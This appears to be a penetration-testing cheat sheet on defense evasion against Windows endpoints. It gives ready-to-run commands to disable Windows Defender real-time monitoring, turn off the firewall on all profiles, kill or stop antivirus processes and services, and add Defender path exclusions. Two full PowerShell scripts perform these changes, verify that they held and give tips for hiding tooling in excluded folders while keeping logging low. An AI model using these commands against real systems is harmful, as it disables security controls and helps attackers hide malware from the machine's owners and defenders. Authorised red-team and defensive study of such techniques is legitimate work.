Secondary Categories: 02-Defense Evasion

Basic Commands

# Disable real-time monitoring for Windows Defender
# (needs an elevated PowerShell session; silently ignored while Tamper Protection is on, so read the state back to confirm)
Set-MpPreference -DisableRealtimeMonitoring $true
 
# Disable the Windows firewall on all profiles (elevated cmd or PowerShell)
netsh advfirewall set allprofiles state off
 
# Kill an antivirus process by image name
# (avprocess.exe is a placeholder; most AV/EDR processes are protected and the kill fails with "Access is denied" even as admin)
taskkill /F /IM avprocess.exe
 
# Stop an antivirus service (substitute the real service name)
net stop "$service_name"
 
# Disable a Windows service so it does not come back on reboot
# (the space after "start=" is required by sc.exe)
sc config "service name" start= disabled
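The one-liners above give no feedback when they are blocked, so the useful habit is to read the state back after each change. The script below is an added example, not part of the original page: it records the Defender state, warns if Tamper Protection is on, attempts the real-time monitoring change, verifies whether it actually took effect, and does the same set-then-read-back for the firewall profiles. It assumes an elevated PowerShell session on Windows 10/11 with the Defender and NetSecurity modules available.

```powershell
# Added example (not from the original page): disable real-time monitoring and the
# firewall, then verify each change instead of trusting the silent cmdlets.
# Assumption: elevated PowerShell on Windows 10/11 with the Defender and
# NetSecurity modules present.

function Get-DefenderState {
    $status = Get-MpComputerStatus
    [pscustomobject]@{
        RealTimeProtectionEnabled = $status.RealTimeProtectionEnabled
        IsTamperProtected         = $status.IsTamperProtected
        AntivirusEnabled          = $status.AntivirusEnabled
    }
}

$before = Get-DefenderState
Write-Host "Before: RTP=$($before.RealTimeProtectionEnabled) TamperProtected=$($before.IsTamperProtected)"

if ($before.IsTamperProtected) {
    # Tamper Protection makes Set-MpPreference a no-op for core settings; it returns
    # no error, which is why the read-back below matters.
    Write-Warning "Tamper Protection is on; Set-MpPreference changes will be ignored unless it is turned off in the Windows Security app or via Intune/MDE."
}

# Attempt the change anyway and verify.
Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
Start-Sleep -Seconds 2
$after = Get-DefenderState

if ($after.RealTimeProtectionEnabled) {
    Write-Warning "Real-time protection is still enabled; the change was blocked or reverted."
} else {
    Write-Host "Real-time protection is now disabled."
}

# Firewall: set all three profiles, then read them back per profile.
Set-NetFirewallProfile -Profile Domain, Private, Public -Enabled False
Get-NetFirewallProfile | Select-Object Name, Enabled
```

Run it from an elevated prompt; the `Before` and `After` lines plus the per-profile firewall table are the evidence that the change stuck, which is what a report needs rather than the bare command.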

Disable Antivirus via GUI

If the current user has permission to modify the AV settings, you can add exclusions so that chosen directories or files are ignored during scanning. Examples of products that expose this in their local GUI:

  • Cisco AMP
  • Windows Defender

On some antivirus/EDR endpoints you may also be able to view the existing exclusion list, which tells you where to drop tooling without changing any settings at all.
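For Windows Defender the GUI steps above can be done and checked from PowerShell. The script below is an added example, not part of the original page: it lists the current path, extension and process exclusions, checks the registry keys where they are also stored, and, if the session is elevated, adds a directory exclusion and confirms it was accepted. `$ExclusionDir` is a hypothetical path chosen for illustration. One caveat: on recent Defender platform versions both `Get-MpPreference` and the registry keys hide exclusions from non-administrators, so an unprivileged read may come back empty even when exclusions exist.

```powershell
# Added example (not from the original page): enumerate Windows Defender exclusions
# and, when elevated, add a directory exclusion and verify it.
# Assumption: $ExclusionDir is a hypothetical path used only for illustration.

$ExclusionDir = 'C:\Users\Public\Tools'

# 1. Exclusions as reported by the Defender module.
$pref = Get-MpPreference
Write-Host "Path exclusions:      $($pref.ExclusionPath -join ', ')"
Write-Host "Extension exclusions: $($pref.ExclusionExtension -join ', ')"
Write-Host "Process exclusions:   $($pref.ExclusionProcess -join ', ')"

# 2. The same data lives in the registry; each excluded item is a value name under these keys.
$regKeys = 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths',
           'HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes'
foreach ($k in $regKeys) {
    if (Test-Path $k) {
        (Get-Item $k).Property | ForEach-Object { Write-Host "$k : $_" }
    } else {
        Write-Host "$k : not present or not readable from this context"
    }
}

# 3. Adding an exclusion requires an elevated session.
$isAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()
           ).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

if (-not $isAdmin) {
    Write-Warning "Not elevated: exclusions may be readable, but Add-MpPreference will fail."
    return
}

Add-MpPreference -ExclusionPath $ExclusionDir

# 4. Verify rather than assume; policy (GPO/Intune) can override local changes.
if ((Get-MpPreference).ExclusionPath -contains $ExclusionDir) {
    Write-Host "Exclusion for $ExclusionDir is in place."
} else {
    Write-Warning "Exclusion for $ExclusionDir was not applied; a managed policy may be enforcing the exclusion list."
}
```

Adding an exclusion is noisier than reading one: the change is logged (Defender operational event log, and MDE if the host is onboarded), so on an engagement prefer reusing an existing excluded directory when one is found.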

